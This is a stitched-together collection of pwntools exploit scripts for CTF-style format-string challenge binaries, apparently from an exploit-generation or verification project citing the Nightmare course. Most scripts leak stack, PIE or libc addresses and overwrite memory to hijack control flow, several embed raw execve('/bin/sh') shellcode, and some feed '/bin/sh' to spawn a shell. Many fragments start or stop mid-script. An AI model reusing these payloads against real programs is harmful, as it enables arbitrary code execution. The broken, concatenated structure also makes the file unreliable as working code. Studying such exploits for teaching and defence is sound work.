import sf
import sys
import signal

# Format-string exploit for ./chall-test_FmtString-13-x86.  The binary prints a
# stack address, then takes input that the author treats both as a printf-style
# format string and as an overflowable buffer.  sf.WriteFmtStr / sf.BufferOverflow
# are project helpers defined outside this file; their offset/alignment arguments
# are tuned to this one binary.  Defender's note: the chain needs a user-controlled
# format string *and* a leaked stack pointer -- a constant format string (or
# FORTIFY_SOURCE's rejection of %n in writable formats) removes the write primitive.
target = process("./chall-test_FmtString-13-x86")
gdb.attach(target, execute="verify_exploit")  # gdb script not in this file
overflow = sf.BufferOverflow(arch=32)  # constructed but not used below

# Parse the hex address printed after the prompt.
target.recvuntil("Tell me I was never good enough: ")
leaked = int(target.recvline().strip(b"\n"), 16)
# 108 bytes above the leak is where the author expects the saved return address
# (inferred from the variable name; the offset is binary-specific).
ret_address = leaked + 108

# Write target and written value are both relative to the leaked address, so the
# write presumably lands inside the current stack frame.
writer = sf.WriteFmtStr(
    arch=32,
    value=-0x46,
    address=0x0,
    offset=0x4,
    printed_bytes=0x0,
    alignment_bytes=0x0,
    value_base=ret_address,
    address_base=ret_address,
)

# Overflow buffer: format string at offset 108, raw machine code (the author's
# shellcode, not decoded here) at offset 70.
buffer = sf.BufferOverflow(arch=32, start=108)
buffer.add_bytes(108, writer.generate_fmt_str())
buffer.add_bytes(
    70,
    b"\x83\xec\x7f\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\x04\x05\x04\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80",
)
target.sendline(buffer.generate_payload())
# Exploit Verification starts here 15935728
from pwn import *
import os
import sf
import sys
import signal

# Format-string exploit for ./chall-test_FmtString-01-x64: a single absolute
# write of 0x401196 to 0x403398 built by sf.WriteFmtStr (project helper, not in
# this file).  No leak is needed because both addresses are fixed, i.e. the
# binary is presumably non-PIE -- PIE plus full RELRO would force a leak and
# make the fixed target read-only.
target = process("./chall-test_FmtString-01-x64")
gdb.attach(target, execute="verify_exploit")  # gdb script not in this file
overflow = sf.BufferOverflow(arch=64)  # constructed but not used below

writer = sf.WriteFmtStr(
    arch=64,
    value=0x401196,
    address=0x403398,
    offset=0x6,
    printed_bytes=0x0,
    alignment_bytes=0x0,
    value_base=0,
    address_base=0,
)
fmt = writer.generate_fmt_str()
target.sendline(fmt)
# Exploit Verification starts here 15935728


def handler(signum, frame):
    """SIGALRM handler installed by the verification harness: abort the run."""
    raise Exception("Timed out")


signal.signal(signal.SIGALRM, handler)
signal.alarm(2)  # the harness gives the exploit two seconds
import signal

# Format-string exploit for ./chall-test_FmtString-17-x86.  The binary leaks an
# address inside its own image; subtracting 4684 (author-chosen, binary-specific)
# gives the PIE base, and every later address/value is given as an offset from it.
# Two writes are prepared; this chunk ends after building the second one.
target = process("./chall-test_FmtString-17-x86")
gdb.attach(target, execute="verify_exploit")  # gdb script not in this file
overflow = sf.BufferOverflow(arch=32)

target.recvuntil("Cancelled out and rendered obsolute: ")
leaked = int(target.recvline().strip(b"\n"), 16)
pie_base = leaked - 4684
overflow.add_base("pie", pie_base)

# First write: 0x124c -> 0x3324, both relative to the PIE base.
writer = sf.WriteFmtStr(
    arch=32,
    value=0x124c,
    address=0x3324,
    offset=0x7,
    printed_bytes=0x0,
    alignment_bytes=0x1,
    value_base=pie_base,
    address_base=pie_base,
)
fmt = writer.generate_fmt_str()
target.sendline(fmt)

# Second write: 0x10b0 -> 0x3330 (not yet sent in this chunk).
writer = sf.WriteFmtStr(
    arch=32,
    value=0x10b0,
    address=0x3330,
    offset=0x7,
    printed_bytes=0x0,
    alignment_bytes=0x1,
    value_base=pie_base,
    address_base=pie_base,
)
import signal

# Format-string exploit for ./chall-test_FmtString-11-x64 run against a pinned
# libc (LD_PRELOAD=./libc-2.30.so) so the libc offsets below stay valid.  The
# binary leaks a libc address; 413040 is the author's offset from that leak to
# the libc base.  The write puts libc_base+0xe6b93 at the fixed address 0x4033b8.
target = process("./chall-test_FmtString-11-x64", env={"LD_PRELOAD": "./libc-2.30.so"})
gdb.attach(target)
overflow = sf.BufferOverflow(arch=64)

target.recvuntil("It seems I've been buried alive: ")
leaked = int(target.recvuntil(b"\n").strip(b"\n"), 16)
libc_base = leaked - 413040
overflow.add_base("libc", libc_base)
print("libcBase is: " + hex(libc_base))

writer = sf.WriteFmtStr(
    arch=64,
    value=0xe6b93,
    address=0x4033b8,
    offset=0x6,
    printed_bytes=0x0,
    alignment_bytes=0x0,
    value_base=libc_base,  # value is libc-relative ...
    address_base=0,  # ... but the target address is absolute
)
fmt = writer.generate_fmt_str()
target.sendline(fmt)
# Exploit Verification starts here 15935728


def handler(signum, frame):
    """SIGALRM handler installed by the verification harness: abort the run."""
    raise Exception("Timed out")


signal.signal(signal.SIGALRM, handler)
signal.alarm(2)  # the harness gives the exploit two seconds
# For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings
from pwn import *
import sf

# Format-string exploit for ./chall-test_FmtString-14-x86: two absolute writes
# into fixed addresses (0x804c010, then 0x804c00c), so no leak is needed.
# sf.WriteFmtStr is a project helper defined outside this file.  This chunk ends
# after building the second write.
target = process("./chall-test_FmtString-14-x86")
gdb.attach(target)
overflow = sf.BufferOverflow(arch=32)  # constructed but not used below

writer = sf.WriteFmtStr(
    arch=32,
    value=0x80492a3,
    address=0x804c010,
    offset=0x6,
    printed_bytes=0x0,
    alignment_bytes=0x1,
    value_base=0,
    address_base=0,
)
fmt = writer.generate_fmt_str()
target.sendline(fmt)

writer = sf.WriteFmtStr(
    arch=32,
    value=0x80490e0,
    address=0x804c00c,
    offset=0x6,
    printed_bytes=0x0,
    alignment_bytes=0x1,
    value_base=0,
    address_base=0,
)
# Leak step (the script's prologue is not in this chunk).  `%3$x` asks the
# vulnerable printf for its third argument; the x/y markers delimit that value
# in the echoed output so it can be cut out and parsed.
probe = b"xxxxxxx" + b"%3$x" + b"yyyyyyy"
target.sendline(probe)
echoed = target.recvuntil(b"yyyyyyy").strip(b"yyyyyyy")
leaked = int(echoed.split(b"xxxxxxx")[1], 16)

# 0x128f is the author's offset from the leaked value to the PIE base.
pie_base = leaked - 0x128f
print("PieBase is: " + hex(pie_base))

# Single PIE-relative write: 0x124d -> 0x3314.
writer = sf.WriteFmtStr(
    arch=32,
    value=0x124d,
    address=0x3314,
    offset=0x6,
    printed_bytes=0x0,
    alignment_bytes=0x0,
    value_base=pie_base,
    address_base=pie_base,
)
fmt = writer.generate_fmt_str()
target.sendline(fmt)
target.interactive()
# Leak step (the script's prologue is not in this chunk).  `%13$lx` asks the
# vulnerable printf for its 13th argument as a 64-bit hex value; the x/y markers
# delimit it in the echoed output.
probe = b"xxxxxxx" + b"%13$lx" + b"yyyyyyy"
target.sendline(probe)
echoed = target.recvuntil(b"yyyyyyy").strip(b"yyyyyyy")
leaked = int(echoed.split(b"xxxxxxx")[1], 16)

# 0xbf7e5 is the author's offset from the leaked value to the libc base.
libc_base = leaked - 0xbf7e5
print("libcBase is: " + hex(libc_base))

# Write libc_base+0x554e0 to the fixed address 0x403358.
writer = sf.WriteFmtStr(
    arch=64,
    value=0x554e0,
    address=0x403358,
    offset=0x8,
    printed_bytes=0x0,
    alignment_bytes=0x0,
    value_base=libc_base,
    address_base=0,
)
fmt = writer.generate_fmt_str()
target.sendline(fmt)
# The next input the program reads is handed a NUL-terminated "/bin/sh".
target.sendline("/bin/sh\x00")
# Exploit Verification starts here 15935728


def handler(signum, frame):
    """SIGALRM handler installed by the verification harness: abort the run."""
    raise Exception("Timed out")
import os
import sf
import sys
import signal

# Format-string exploit for ./chall-test_angstrum16-format1: one absolute write
# of 0x40074d to 0x601030 (fixed addresses, so no leak).  sf.WriteFmtStr is a
# project helper defined outside this file.
target = process("./chall-test_angstrum16-format1")
gdb.attach(target, execute="verify_exploit")  # gdb script not in this file
overflow = sf.BufferOverflow(arch=64)  # constructed but not used below

writer = sf.WriteFmtStr(
    arch=64,
    value=0x40074d,
    address=0x601030,
    offset=0x8,
    printed_bytes=0x0,
    alignment_bytes=0x0,
    value_base=0,
    address_base=0,
)
fmt = writer.generate_fmt_str()
target.sendline(fmt)
# Exploit Verification starts here 15935728


def handler(signum, frame):
    """SIGALRM handler installed by the verification harness: abort the run."""
    raise Exception("Timed out")


signal.signal(signal.SIGALRM, handler)
signal.alarm(2)  # the harness gives the exploit two seconds
from pwn import *
import sf

# Format-string exploit for ./chall-test_FmtString-13-x64.  The binary leaks a
# stack address; the author treats leak+152 as the saved return address (name
# inferred) and writes it, minus 0x40, into the fixed address 0x403390.  The
# same buffer also carries raw machine code (the author's shellcode, not decoded
# here).  sf.* helpers are defined outside this file.
target = process("./chall-test_FmtString-13-x64")
gdb.attach(target)
overflow = sf.BufferOverflow(arch=64)  # constructed but not used below

target.recvuntil("Tell me I was never good enough: ")
leaked = int(target.recvuntil(b"\n").strip(b"\n"), 16)
ret_address = leaked + 152

writer = sf.WriteFmtStr(
    arch=64,
    value=-0x40,
    address=0x403390,
    offset=0x6,
    printed_bytes=0x0,
    alignment_bytes=0x0,
    value_base=ret_address,
    address_base=0,
)

buffer = sf.BufferOverflow(arch=64, start=152)
buffer.add_bytes(152, writer.generate_fmt_str())
buffer.add_bytes(
    64,
    b"\x31\xf6\x48\xbf\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f\x0f\x05",
)
target.sendline(buffer.generate_payload())
target.interactive()
# For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings
from pwn import *
import sf

# Format-string exploit for ./chall-test_ractf-nra: one absolute write of
# 0x8049245 to 0x804c018.  Fixed addresses mean the binary is presumably
# non-PIE; sf.WriteFmtStr is a project helper defined outside this file.
target = process("./chall-test_ractf-nra")
gdb.attach(target)
overflow = sf.BufferOverflow(arch=32)  # constructed but not used below

writer = sf.WriteFmtStr(
    arch=32,
    value=0x8049245,
    address=0x804c018,
    offset=0x4,
    printed_bytes=0x0,
    alignment_bytes=0x0,
    value_base=0,
    address_base=0,
)
fmt = writer.generate_fmt_str()
target.sendline(fmt)
target.interactive()
# For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings
from pwn import *
import sf

# Format-string exploit for ./chall-test_FmtString-03-x64: one absolute write
# of 0x8049236 to 0x804b2f4.  Note the helpers are built with arch=32 even
# though the file name says x64 -- the 0x804xxxx addresses fit a 32-bit image,
# so the name is presumably just the challenge label.  printed_bytes=0x5 tells
# sf.WriteFmtStr (project helper) how much output precedes the format string.
target = process("./chall-test_FmtString-03-x64")
gdb.attach(target)
overflow = sf.BufferOverflow(arch=32)  # constructed but not used below

writer = sf.WriteFmtStr(
    arch=32,
    value=0x8049236,
    address=0x804b2f4,
    offset=0x8,
    printed_bytes=0x5,
    alignment_bytes=0x2,
    value_base=0,
    address_base=0,
)
fmt = writer.generate_fmt_str()
target.sendline(fmt)
target.interactive()
# For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings
from pwn import *
import sf

# Format-string exploit for ./chall-test_FmtString-02-x64: one absolute write
# of 0x8049216 to 0x804b2e4.  Built with arch=32 (the addresses fit a 32-bit
# image; the x64 in the file name is presumably just the label).
# printed_bytes=0x10 accounts for output already emitted before the format
# string is consumed -- an sf.WriteFmtStr parameter, helper not in this file.
target = process("./chall-test_FmtString-02-x64")
gdb.attach(target)
overflow = sf.BufferOverflow(arch=32)  # constructed but not used below

writer = sf.WriteFmtStr(
    arch=32,
    value=0x8049216,
    address=0x804b2e4,
    offset=0xa,
    printed_bytes=0x10,
    alignment_bytes=0x0,
    value_base=0,
    address_base=0,
)
fmt = writer.generate_fmt_str()
target.sendline(fmt)
target.interactive()
from pwn import *
import os
import sf
import sys
import signal

# Format-string exploit for ./chall-test_tamu17-pwn3: one absolute write of
# 0x80485ab to 0x804a01c, no leak needed.  sf.WriteFmtStr is a project helper
# defined outside this file.
target = process("./chall-test_tamu17-pwn3")
gdb.attach(target, execute="verify_exploit")  # gdb script not in this file
overflow = sf.BufferOverflow(arch=32)  # constructed but not used below

writer = sf.WriteFmtStr(
    arch=32,
    value=0x80485ab,
    address=0x804a01c,
    offset=0x4,
    printed_bytes=0x0,
    alignment_bytes=0x0,
    value_base=0,
    address_base=0,
)
fmt = writer.generate_fmt_str()
target.sendline(fmt)
# Exploit Verification starts here 15935728


def handler(signum, frame):
    """SIGALRM handler installed by the verification harness: abort the run."""
    raise Exception("Timed out")


signal.signal(signal.SIGALRM, handler)
signal.alarm(2)  # the harness gives the exploit two seconds
import sf

# Format-string exploit for ./chall-test_FmtString-15-x86.  The binary leaks an
# address in its own image; 4826 is the author's offset to the PIE base.  Two
# PIE-relative writes follow (0x12da -> 0x33a4, then 0x10f0 -> 0x33a0).
# sf.* helpers are defined outside this file.
target = process("./chall-test_FmtString-15-x86")
gdb.attach(target)
overflow = sf.BufferOverflow(arch=32)

target.recvuntil("Total Nightmare: ")
leaked = int(target.recvline().strip(b"\n"), 16)
pie_base = leaked - 4826
overflow.add_base("pie", pie_base)

for value, address in ((0x12da, 0x33a4), (0x10f0, 0x33a0)):
    writer = sf.WriteFmtStr(
        arch=32,
        value=value,
        address=address,
        offset=0x6,
        printed_bytes=0x0,
        alignment_bytes=0x1,
        value_base=pie_base,
        address_base=pie_base,
    )
    fmt = writer.generate_fmt_str()
    target.sendline(fmt)
from pwn import *
import sf

# Format-string exploit for ./chall-test_FmtString-11-x86.  The binary leaks a
# stack address; the author treats leak+532 as the saved return address (name
# inferred) and writes the fixed value 0x80491f6 there.  Here address_base
# carries the leak and address is 0, while value_base=None marks the value as
# absolute (sf.WriteFmtStr semantics; helper not in this file).
target = process("./chall-test_FmtString-11-x86")
gdb.attach(target)
overflow = sf.BufferOverflow(arch=32)  # constructed but not used below

target.recvuntil("Tell me I was never good enough: ")
leaked = int(target.recvline().strip(b"\n"), 16)
ret_address = leaked + 532

writer = sf.WriteFmtStr(
    arch=32,
    value=0x80491f6,
    address=0x0,
    offset=0x6,
    printed_bytes=0x0,
    alignment_bytes=0x0,
    value_base=None,
    address_base=ret_address,
)
fmt = writer.generate_fmt_str()
target.sendline(fmt)
target.interactive()
from pwn import *
import sf

# Format-string exploit for ./chall-test_FmtString-20-x86.  The binary leaks a
# stack address; leak+87 is the author's return-address slot (name inferred).
# The format string writes that value minus 0x31 to the fixed address
# 0x804b2d8, and the same buffer carries raw machine code (the author's
# shellcode, not decoded here) at offset 49.  sf.* helpers are not in this file.
target = process("./chall-test_FmtString-20-x86")
gdb.attach(target)
overflow = sf.BufferOverflow(arch=32)  # constructed but not used below

target.recvuntil("Tell me I was never good enough: ")
leaked = int(target.recvline().strip(b"\n"), 16)
ret_address = leaked + 87

writer = sf.WriteFmtStr(
    arch=32,
    value=-0x31,
    address=0x804b2d8,
    offset=0x6,
    printed_bytes=0x0,
    alignment_bytes=0x3,
    value_base=ret_address,
    address_base=0,
)

buffer = sf.BufferOverflow(arch=32, start=87)
buffer.add_bytes(87, writer.generate_fmt_str())
buffer.add_bytes(
    49,
    b"\x83\xec\x7f\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\x04\x05\x04\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80",
)
target.sendline(buffer.generate_payload())
target.interactive()
import os
import sf
import sys
import signal

# Format-string exploit for ./chall-test_redpwn19-rot26: one absolute write of
# 0x8048737 to 0x804a020, no leak needed.  sf.WriteFmtStr is a project helper
# defined outside this file.
target = process("./chall-test_redpwn19-rot26")
gdb.attach(target, execute="verify_exploit")  # gdb script not in this file
overflow = sf.BufferOverflow(arch=32)  # constructed but not used below

writer = sf.WriteFmtStr(
    arch=32,
    value=0x8048737,
    address=0x804a020,
    offset=0x7,
    printed_bytes=0x0,
    alignment_bytes=0x0,
    value_base=0,
    address_base=0,
)
fmt = writer.generate_fmt_str()
target.sendline(fmt)
# Exploit Verification starts here 15935728


def handler(signum, frame):
    """SIGALRM handler installed by the verification harness: abort the run."""
    raise Exception("Timed out")


signal.signal(signal.SIGALRM, handler)
signal.alarm(2)  # the harness gives the exploit two seconds
# For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings
from pwn import *
import time
import sf

# Format-string exploit for ./Correction-FsGotShellcodeFsleak-x86.  Step one is
# an absolute write (0x804922b -> 0x804b2b0).  Step two sends a second input
# that starts with raw machine code (the author's shellcode, not decoded here)
# and ends with a `%134$x` probe whose result is delimited by the x/y markers.
# The chunk ends after the leaked text is cut out, before it is parsed.
target = process("./Correction-FsGotShellcodeFsleak-x86")
gdb.attach(target)
overflow = sf.BufferOverflow(arch=32)  # constructed but not used below

writer = sf.WriteFmtStr(
    arch=32,
    value=0x804922b,
    address=0x804b2b0,
    offset=0x7,
    printed_bytes=0x0,
    alignment_bytes=0x0,
    value_base=0,
    address_base=0,
)
fmt = writer.generate_fmt_str()
target.sendline(fmt)

probe = b"".join(
    [
        b"\x83\xec\x7f\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\x04\x05\x04\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80",
        b"xxxxxxx",
        b"%134$x",
        b"yyyyyyy",
    ]
)
target.sendline(probe)
echoed = target.recvuntil(b"yyyyyyy").strip(b"yyyyyyy")
leaked = echoed.split(b"xxxxxxx")[1]
from pwn import *
import os
import sf
import sys
import signal

# Format-string exploit for ./chall-test_FmtString-16-x86: one absolute write of
# 0x80491e6 to 0x804b310, no leak needed.  alignment_bytes=0x3 pads the format
# string so the embedded address lands on an argument boundary (sf.WriteFmtStr
# parameter; helper not in this file).
target = process("./chall-test_FmtString-16-x86")
gdb.attach(target, execute="verify_exploit")  # gdb script not in this file
overflow = sf.BufferOverflow(arch=32)  # constructed but not used below

writer = sf.WriteFmtStr(
    arch=32,
    value=0x80491e6,
    address=0x804b310,
    offset=0x7,
    printed_bytes=0x0,
    alignment_bytes=0x3,
    value_base=0,
    address_base=0,
)
fmt = writer.generate_fmt_str()
target.sendline(fmt)
# Exploit Verification starts here 15935728


def handler(signum, frame):
    """SIGALRM handler installed by the verification harness: abort the run."""
    raise Exception("Timed out")


signal.signal(signal.SIGALRM, handler)
signal.alarm(2)  # the harness gives the exploit two seconds
import sf
from pwn import *

# Format-string exploit run against a network service (localhost:30011) rather
# than a local process; the commented alternative below is the local/gdb setup.
# After a fixed first answer ("00") the same absolute write (0x80484e6 ->
# 0x8049918) is sent twice.  sf.WriteFmtStr is a project helper not in this file.
target = remote("localhost", 30011)
# Local alternative:
#   target = process("./chall_11")
#   gdb.attach(target)

target.sendline(b"00")
target.recvline()

writer = sf.WriteFmtStr(
    arch=32,
    value=0x80484e6,
    address=0x8049918,
    offset=0x6,
    printed_bytes=0x0,
    alignment_bytes=0x0,
    value_base=0x0,
    address_base=0x0,
)
fmt = writer.generate_fmt_str()
for _ in range(2):
    target.sendline(fmt)
target.interactive()
import sf

# Format-string exploit for ./chall-test_FmtString-04-x64.  The binary leaks an
# address in its own image; 4576 is the author's offset to the PIE base, and the
# single write (0x11c9 -> 0x33d0) is expressed relative to that base.
# sf.* helpers are defined outside this file.
target = process("./chall-test_FmtString-04-x64")
gdb.attach(target)
overflow = sf.BufferOverflow(arch=64)

target.recvuntil("We're dreaming: ")
leaked = int(target.recvuntil(b"\n").strip(b"\n"), 16)
pie_base = leaked - 4576
overflow.add_base("pie", pie_base)

writer = sf.WriteFmtStr(
    arch=64,
    value=0x11c9,
    address=0x33d0,
    offset=0x6,
    printed_bytes=0x0,
    alignment_bytes=0x0,
    value_base=pie_base,
    address_base=pie_base,
)
fmt = writer.generate_fmt_str()
target.sendline(fmt)
target.interactive()
# For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings
from pwn import *
import time
import sf

# Format-string exploit for ./Correction-FsGotShellcodeFsleak-x64.  Step one is
# an absolute write (0x4011be -> 0x403388).  Step two sends a `%70$lx` probe,
# delimited by the x/y markers, followed by raw machine code (the author's
# shellcode, not decoded here), and parses the echoed value.  The chunk ends
# with the parsed leak; what it is used for is outside this view.
target = process("./Correction-FsGotShellcodeFsleak-x64")
gdb.attach(target)
overflow = sf.BufferOverflow(arch=64)  # constructed but not used below

writer = sf.WriteFmtStr(
    arch=64,
    value=0x4011be,
    address=0x403388,
    offset=0x6,
    printed_bytes=0x0,
    alignment_bytes=0x0,
    value_base=0,
    address_base=0,
)
fmt = writer.generate_fmt_str()
target.sendline(fmt)

probe = b"".join(
    [
        b"xxxxxxx",
        b"%70$lx",
        b"yyyyyyy",
        b"\x31\xf6\x48\xbf\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f\x0f\x05",
    ]
)
target.sendline(probe)
echoed = target.recvuntil(b"yyyyyyy").strip(b"yyyyyyy")
leaked = int(echoed.split(b"xxxxxxx")[1], 16)
# Leak step (the script's prologue is not in this chunk).  `%2$x` asks the
# vulnerable printf for its second argument; the x/y markers delimit it in the
# echoed output.
probe = b"xxxxxxx" + b"%2$x" + b"yyyyyyy"
target.sendline(probe)
echoed = target.recvuntil(b"yyyyyyy").strip(b"yyyyyyy")
leaked = int(echoed.split(b"xxxxxxx")[1], 16)

# 0x1e9580 is the author's offset from the leaked value to the libc base.
libc_base = leaked - 0x1e9580
print("libcBase is: " + hex(libc_base))

# Write libc_base+0x458b0 to the fixed address 0x804b2a0.
writer = sf.WriteFmtStr(
    arch=32,
    value=0x458b0,
    address=0x804b2a0,
    offset=0x6,
    printed_bytes=0x0,
    alignment_bytes=0x0,
    value_base=libc_base,
    address_base=0,
)
fmt = writer.generate_fmt_str()
target.sendline(fmt)
# The next input the program reads is handed a NUL-terminated "/bin/sh".
target.sendline("/bin/sh\x00")
# Exploit Verification starts here 15935728


def handler(signum, frame):
    """SIGALRM handler installed by the verification harness: abort the run."""
    raise Exception("Timed out")
# For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings
from pwn import *
import sf

# Format-string exploit for ./chall-test_backdoor17-bbpwn: one absolute write
# of 0x804870b to 0x804a028, no leak needed.  printed_bytes=0x46 tells
# sf.WriteFmtStr (project helper, not in this file) how many bytes the program
# has already printed before the format string is consumed.
target = process("./chall-test_backdoor17-bbpwn")
gdb.attach(target)
overflow = sf.BufferOverflow(arch=32)  # constructed but not used below

writer = sf.WriteFmtStr(
    arch=32,
    value=0x804870b,
    address=0x804a028,
    offset=0xa,
    printed_bytes=0x46,
    alignment_bytes=0x0,
    value_base=0,
    address_base=0,
)
fmt = writer.generate_fmt_str()
target.sendline(fmt)
target.interactive()